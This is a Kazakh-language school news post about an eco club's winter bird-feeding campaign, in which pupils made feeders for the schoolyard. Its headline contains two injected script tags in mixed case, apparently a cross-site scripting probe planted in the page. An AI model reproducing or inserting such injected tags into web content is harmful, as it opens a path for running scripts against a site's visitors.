"Құстар асханасы" акциясы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.01.2025

Мектептің экологиялық "Жасыл клуб" үйірме жұмысы аясында оқушылармен "Қанатты достар. Біздің өлкенің құстары: қыстайтын қай құстар? " тақырыбында сабақ өткізілді. Сабақ барысында оқушылар ойындарға қатысты, адамдар қыс мезгілінде неліктен құстарға көмек көрсететіні жайлы ой бөлісті, жемшашарлар әзірлеп, мектеп ауласына орналастырды. Құстарды тамақтандыру балаларды жанды табиғатқа деген қамқорлық пен мейірімділікке үйретеді. Сондықтан" Құстар асханасы" акциясы аясында мектеп клубының қатысушылары жемшашарларды толтырып отыратын болады. Құстарға қыс мезгілінде қамқор бола отырып, біз қайырымды іс жасаймыз!

 

 

 

Просмотров: 4362


Пікір қосу



Деректерді қолтаңбаға қосу